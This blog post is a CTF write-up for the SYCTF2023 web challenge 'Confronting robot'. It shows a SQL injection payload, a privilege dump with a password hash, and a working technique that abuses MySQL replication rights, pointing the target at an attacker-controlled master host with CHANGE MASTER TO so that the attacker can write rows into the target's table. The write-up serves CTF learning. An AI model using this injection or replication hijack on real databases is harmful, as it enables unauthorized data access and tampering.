【SYCTF2023】Confronting robot - 正汰的学习笔记

Mysql主从复制的模板题，以及一些需要注意的地方
复现了一波SYCTF2023，算是我见到的比较有新意的题目之一，至少不是纯牛马套娃题

首先我们可以通过注入把表中的信息注出来，得到一个URL

http://<URL>?myname=123'union select group_concat(username) from name;--+

观察挑战可知，需要往game里面写数据

 <!-- 机器人的游戏策略：for($i=1;$i<=10;$i++){ $choice="SELECT choice FROM `game` WHERE round='$i'"; }-->

show databases和show tables后尝试insert未成功
查询当前用户

select current_user()
#array(1) { [0]=> array(1) { [0]=> string(16) "secret@localhost" } }

查询当前用户权限，没有insert权限难怪无法插入

SHOW GRANTS FOR secret@localhost;
#array(1) { [0]=> array(1) { [0]=> string(197) "GRANT SELECT, RELOAD, PROCESS, SUPER, REPLICATION SLAVE, REPLICATION CLIENT, SHOW VIEW, CREATE USER ON *.* TO 'secret'@'localhost' IDENTIFIED BY PASSWORD '*C4809B442CD41D91C25BAEA070D00FF39A87190D'" } }

但是看到有主从复制权限REPLICATION SLAVE, REPLICATION CLIENT，考虑进行主从复制
在master创建一个数据库

嫌麻烦直接将game_data设置为全权限

并且设置仅同步game_data防止出现其他信息，重载配置

查询game的表结构

desc game;
/*
array(2) {
  [0]=>
  array(6) {
    [0]=>
    string(5) "round"
    [1]=>
    string(8) "int(255)"
    [2]=>
    string(2) "NO"
    [3]=>
    string(0) ""
    [4]=>
    NULL
    [5]=>
    string(0) ""
  }
  [1]=>
  array(6) {
    [0]=>
    string(6) "choice"
    [1]=>
    string(12) "varchar(256)"
    [2]=>
    string(2) "NO"
    [3]=>
    string(0) ""
    [4]=>
    NULL
    [5]=>
    string(0) ""
  }
}
*/

在master中创建相同的表

CREATE TABLE IF NOT EXISTS `game` (
  `round` int(255) NOT NULL,
  `choice` varchar(256) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

然后我们需要找到relay日志的文件名和偏移量方便文件重构

show master status
#master_log_file = mysql-bin.000221
#master_log_pos = 63695

在开始主从同步之前要先停止，踩坑（对应的日志和偏移量要修改）

stop slave;
change master to master_host='<YOUR_IP>',master_port=3306,master_user='game_data',master_password='game_data',master_log_file='mysql-bin.000221',master_log_pos=63695;
start slave;
show slave status;

这里有个细节要判断11,12这两个数据是否为YES才是正确主从同步，之前总是ERROR

array(1) {
  [0]=>
  array(53) {
    [0]=>
    string(23) "Checking master version"
    [1]=>
    string(14) "<YOUR_IP>"
    [2]=>
    string(9) "game_data"
    [3]=>
    string(4) "3306"
    [4]=>
    string(2) "60"
    [5]=>
    string(16) "mysql-bin.000221"
    [6]=>
    string(5) "63695"
    [7]=>
    string(52) "web-pursue0h-robot-7d84b6c5cc794d45-relay-bin.000001"
    [8]=>
    string(1) "4"
    [9]=>
    string(16) "mysql-bin.000221"
    [10]=>
    string(9) "Preparing"
    [11]=>
    string(3) "Yes"
    [12]=>
    string(0) ""
    [13]=>
    string(0) ""
    [14]=>
    string(0) ""
    [15]=>
    string(0) ""
    [16]=>
    string(0) ""
    [17]=>
    string(0) ""
    [18]=>
    string(1) "0"
    [19]=>
    string(0) ""
    [20]=>
    string(1) "0"
    [21]=>
    string(5) "63695"
    [22]=>
    string(3) "256"
    [23]=>
    string(4) "None"
    [24]=>
    string(0) ""
    [25]=>
    string(1) "0"
    [26]=>
    string(2) "No"
    [27]=>
    string(0) ""
    [28]=>
    string(0) ""
    [29]=>
    string(0) ""
    [30]=>
    string(0) ""
    [31]=>
    string(0) ""
    [32]=>
    NULL
    [33]=>
    string(2) "No"
    [34]=>
    string(1) "0"
    [35]=>
    string(0) ""
    [36]=>
    string(1) "0"
    [37]=>
    string(0) ""
    [38]=>
    string(0) ""
    [39]=>
    string(1) "1"
    [40]=>
    string(0) ""
    [41]=>
    string(0) ""
    [42]=>
    string(2) "No"
    [43]=>
    string(0) ""
    [44]=>
    string(0) ""
    [45]=>
    string(0) ""
    [46]=>
    string(12) "conservative"
    [47]=>
    string(1) "0"
    [48]=>
    NULL
    [49]=>
    string(75) "Slave has read all relay log; waiting for the slave I/O thread to update it"
    [50]=>
    string(1) "0"
    [51]=>
    string(1) "0"
    [52]=>
    string(1) "0"
  }
}

在等待IO时迅速插入数据，不然就要等下一次IO好久的（

INSERT INTO `game` (`round`, `choice`) VALUES (1, 'R'),(2, 'R'),(3, 'R'),(4, 'R'),(5, 'R'),(6, 'R'),(7, 'R'),(8, 'R'),(9, 'R'),(10, 'R');

等一段时间查询

select * from game

已经有数据了，直接出拳！

得到FLAG

发送评论 编辑评论

推荐文章

发送评论编辑评论